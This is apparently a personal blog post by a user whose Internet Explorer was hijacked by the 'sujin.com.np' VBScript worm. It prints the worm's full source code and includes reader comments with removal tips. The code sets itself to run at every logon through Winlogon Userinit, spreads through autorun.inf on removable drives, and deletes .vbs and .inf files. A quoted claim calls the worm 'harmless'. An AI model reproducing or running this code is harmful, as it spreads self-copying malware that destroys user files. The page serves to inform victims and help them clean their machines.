It was just today that I noticed whenever I opened my Internet Explorer; the title of my browser shows ‘sujin.com.np’ and my home page has been changed to sujin.com.np. I was scared for a moment. What could have happened? Did someone hacked into my explorer and stealing my private data? I have free edition of AVG installed and I am regularly updating it but it couldn’t detect the so called ‘sujin.com.np’ virus.
Anyways, I knew that the only thing that could solve my problem was the internet and as I predicted I found many solutions. Actually, this might got into my computer through someone’s flash drive or something. It was just some script programmed by some guy from Nepal in Visual Basic that changed some registry settings and copied itself to all drives in root directory.
The VBS file in notepad looked like this:
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'************************************************* *****************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'************************************************* *****************
'************************************************* *****************
'Program developed by
'Sujin Joshi
'http://Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives, InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,fi les,Delete,auto,root
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
Count=Drv.DriveType
Do
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools","0","REG_DWORD "
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"
For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=ro ot Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"
If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If
If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next
if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
A post in the boyutal’s blog says that it’s just a harmless VBScript file installed in your computer which just:
1.) Modifies registry settings to do tasks such as Disabling the Access To Taskbar, Setting The Start Page of Internet Explorer to "sujin.com.np" and modifies the UserInit settings to execute Virusremoval.vbs
2.) Stores a copy of itself to all Drives in root directory.
3.) Removes all vbs files in Windows directory and Root directory and all inf files in root directories of drives.
4.) Removes ravmon.exe, sxs.exe, winfile.exe and run.wsh.(Maybe these are the files of some malware that its author wants to remove)
5.) Stores VirusRemoval.vbs in root and adding the autorun.inf to make sure that it auto executes if it's installed in a removable disk (i.e. flashdrives).
And that’s it........it's harmless ..
I don’t know I still think there is something fishy about this.
-------------------------------------------------------------
Read about Terrie Spieker or Orlando Figes.
-------------------------------------------------------------
3 comments:
This loads automatically from:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Userinit value
U'll see VirusRemoval.vbs is loads with wscript.
change it to its default value:
Userinit=userinit.exe
OR
U'll get a cleaner from here:
http://www.baayu.com.np/download/index.php
thx & regds...Nasir
Well I too m facing d same problem.. n I'm nt able 2 change its script to its default value.. How 2 do that??
I have posted its solution in this blog too ...
http://www.craze4tech.com/2007/12/solutions-for-sujincomnp-virus.html
check the about post and download the scanner
Post a Comment